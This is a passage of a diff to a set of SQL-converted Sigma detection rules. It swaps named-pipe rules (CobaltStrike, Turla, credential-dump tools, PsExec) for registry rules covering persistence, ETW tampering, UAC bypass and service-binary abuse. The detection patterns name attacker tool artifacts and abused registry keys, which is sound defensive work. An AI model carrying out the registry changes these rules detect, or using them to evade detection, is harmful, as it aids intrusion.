'\\')))" ], - "filename": "pipe_created_psexec_pipes_artifacts.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential Persistence Via Mpnotify", + "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" ], - "filename": "pipe_created_mal_namedpipes.yml" + "filename": "registry_set_persistence_mpnotify.yml" }, { - "title": "Cred Dump-Tools Named Pipes", - "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", - "status": "test", - "description": "Detects well-known credential dumping tools execution via specific named pipes", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "ETW Logging Disabled For SCM", + "id": "4f281b83-0200-4b34-bf35-d24687ea57c2", + "status": "experimental", + "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Legitimate Administrator using tool for password recovery" + "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Tracing\\\\SCM\\\\Regular\\\\TracingDisabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "pipe_created_cred_dump_tools_named_pipes.yml" + "filename": "registry_set_services_etw_tamper.yml" }, { - "title": "Koh Default Named Pipes", - "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", - "status": "experimental", - "description": "Detects creation of default named pipes used by the Koh tool", + "title": "Potential Persistence Via Event Viewer Events.asp", + "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", + "status": "test", + "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1528", - "attack.t1134.001" + "attack.persistence", + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND NewValue LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND NewValue LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (NewValue = 'http://go.microsoft.com/fwlink/events.asp') OR (NewValue = '(Empty)')))" ], - "filename": "pipe_created_koh_default_pipe.yml" + "filename": "registry_set_persistence_event_viewer_events_asp.yml" }, { - "title": "PowerShell Execution Via Named Pipe", - "id": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", - "status": "test", - "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Modification of Explorer Hidden Keys", + "id": "5a5152f1-463f-436b-b2f5-8eceb3964b42", + "status": "experimental", + "description": "Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '\\\\PSHost%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowSuperHidden' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_powershell_execution_pipe.yml" + "filename": "registry_set_hide_file.yml" }, { - "title": "ADFS Database Named Pipe Connection", - "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", - "status": "test", - "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "ETW Logging Disabled For rpcrt4.dll", + "id": "90f342e1-1aaa-4e43-b092-39fda57ed11e", + "status": "experimental", + "description": "Detects changes to the \"ExtErrorInformation\" key in order to disable ETW logging for rpcrt4.dll", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Processes in the filter condition" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\Rpc\\\\ExtErrorInformation' ESCAPE '\\' AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000002)'))" ], - "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" + "filename": "registry_set_rpcrt4_etw_tamper.yml" }, { - "title": "EfsPotato Named Pipe", - "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "title": "Service Binary in Uncommon Folder", + "id": "277dc340-0540-42e7-8efb-5ff460045e07", "status": "experimental", - "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "description": "Detect the creation of a service with a service binary located in a uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\') OR (NewValue LIKE '%\\\\AppData\\\\Roaming\\\\Zoom%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Zoom%' ESCAPE '\\')))" ], - "filename": "pipe_created_efspotato_namedpipe.yml" + "filename": "registry_set_creation_service_uncommon_folder.yml" }, { - "title": "CobaltStrike Named Pipe Patterns", - "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", - "status": "test", - "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", - "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", + "title": "Persistence Via New SIP Provider", + "id": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "status": "experimental", + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1553.003" ], "falsepositives": [ - "Chrome instances using the exact same pipe name \"mojo.something\"" + "Legitimate SIP being registered by the OS or different software." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\Cryptography\\\\OID\\\\EncodingType%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Dll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\$DLL%' ESCAPE '\\')) AND NOT ((NewValue IN ('WINTRUST.DLL', 'mso.dll')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CryptSIPDll%' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\System32\\\\PsfSip.dll' ESCAPE '\\')))" ], - "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" + "filename": "registry_set_sip_persistence.yml" }, { - "title": "PsExec Tool Execution From Suspicious Locations - PipeName", - "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", - "status": "experimental", - "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Keyboard Layout Load", + "id": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "status": "test", + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Rare legitimate use of psexec from the locations mentioned above" + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Keyboard Layout\\\\Preload\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Keyboard Layout\\\\Substitutes\\\\%' ESCAPE '\\') AND (NewValue LIKE '%00000429%' ESCAPE '\\' OR NewValue LIKE '%00050429%' ESCAPE '\\' OR NewValue LIKE '%0000042a%' ESCAPE '\\'))" ], - "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" + "filename": "registry_set_susp_keyboard_layout_load.yml" }, { - "title": "DiagTrackEoP Default Named Pipe", - "id": "1f7025a6-e747-4130-aac4-961eb47015f1", - "status": "experimental", - "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Bypass UAC Using DelegateExecute", + "id": "46dd5308-4572-4d12-aa43-8938f0184d4f", + "status": "test", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.privilege_escalation" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" ], - "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "Turla Group Named Pipes", - "id": "739915e4-1e70-4778-8b8a-17db02f66db1", - "status": "test", - "description": "Detects a named pipe used by Turla group samples", - "author": "Markus Neis", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1106" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "pipe_created_apt_turla_namedpipes.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "CobaltStrike Named Pipe Pattern Regex", - "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", - "status": "test", - "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "status": "experimental", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "pipe_created_mal_cobaltstrike_re.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "WMI Event Consumer Created Named Pipe", - "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", - "status": "test", - "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ - "attack.t1047", - "attack.execution" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "PAExec Default Named Pipe", - "id": "f6451de4-df0a-41fa-8d72-b39f54a08db5", - "status": "test", - "description": "Detects PAExec default named pipe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "CrashControl CrashDump Disabled", + "id": "2ff692c2-4594-41ec-8fcb-46587de769e0", + "status": "experimental", + "description": "Detects disabling the CrashDump per registry (as used by HermeticWiper)", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.t1564", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate disabling of crashdumps" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE PipeName LIKE '\\\\PAExec%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SYSTEM\\\\CurrentControlSet\\\\Control\\\\CrashControl%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "pipe_created_paexec_default_pipe.yml" + "filename": "registry_set_crashdump_disabled.yml" }, { - "title": "CobaltStrike Named Pipe", - "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", - "status": "test", - "description": "Detects the creation of a named pipe as used by CobaltStrike", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", + "status": "experimental", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE 